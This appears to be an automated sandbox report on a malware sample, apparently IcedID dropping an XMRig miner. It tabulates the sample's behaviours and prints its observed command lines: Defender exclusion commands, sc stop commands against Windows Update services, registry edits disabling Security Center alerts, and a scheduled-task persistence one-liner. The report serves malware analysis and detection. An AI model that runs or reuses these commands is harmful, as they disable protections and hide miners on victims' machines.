| PID 1340 created 1200 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
Xmrig family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E215.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1886311780.exe | N/A |
| N/A | N/A | C:\Windows\sysppvrdnvs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1471214819.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\13335841.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\712929886.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1742823082.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\188420960.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E215.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E215.exe | N/A |
| N/A | N/A | C:\Windows\sysppvrdnvs.exe | N/A |
| N/A | N/A | C:\Windows\sysppvrdnvs.exe | N/A |
| N/A | N/A | C:\Windows\sysppvrdnvs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\712929886.exe | N/A |
| N/A | N/A | C:\Windows\sysppvrdnvs.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" | C:\Users\Admin\AppData\Local\Temp\1886311780.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1340 set thread context of 1756 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\conhost.exe |
| PID 1340 set thread context of 2884 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\dwm.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysppvrdnvs.exe | C:\Users\Admin\AppData\Local\Temp\1886311780.exe | N/A |
| File opened for modification | C:\Windows\sysppvrdnvs.exe | C:\Users\Admin\AppData\Local\Temp\1886311780.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysppvrdnvs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\712929886.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\E215.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1886311780.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1471214819.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1742823082.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1742823082.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1742823082.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1742823082.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1471214819.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\dwm.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\dwm.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid.exe
"C:\Users\Admin\AppData\Local\Temp\2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid.exe"
C:\Users\Admin\AppData\Local\Temp\E215.exe
"C:\Users\Admin\AppData\Local\Temp\E215.exe"
C:\Users\Admin\AppData\Local\Temp\1886311780.exe
C:\Users\Admin\AppData\Local\Temp\1886311780.exe
C:\Windows\sysppvrdnvs.exe
C:\Windows\sysppvrdnvs.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
C:\Windows\SysWOW64\sc.exe
sc stop UsoSvc
C:\Windows\SysWOW64\sc.exe
sc stop WaaSMedicSvc
C:\Windows\SysWOW64\sc.exe
sc stop wuauserv
C:\Windows\SysWOW64\sc.exe
sc stop DoSvc
C:\Windows\SysWOW64\sc.exe
sc stop BITS /wait
C:\Users\Admin\AppData\Local\Temp\1471214819.exe
C:\Users\Admin\AppData\Local\Temp\1471214819.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Users\Admin\AppData\Local\Temp\13335841.exe
C:\Users\Admin\AppData\Local\Temp\13335841.exe
C:\Users\Admin\AppData\Local\Temp\712929886.exe
C:\Users\Admin\AppData\Local\Temp\712929886.exe
C:\Users\Admin\AppData\Local\Temp\1742823082.exe
C:\Users\Admin\AppData\Local\Temp\1742823082.exe
C:\Users\Admin\AppData\Local\Temp\188420960.exe
C:\Users\Admin\AppData\Local\Temp\188420960.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Windows\system32\taskeng.exe
taskeng.exe {103BB9A3-FE40-4C36-82CA-CF36EE931D91} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
Network
Files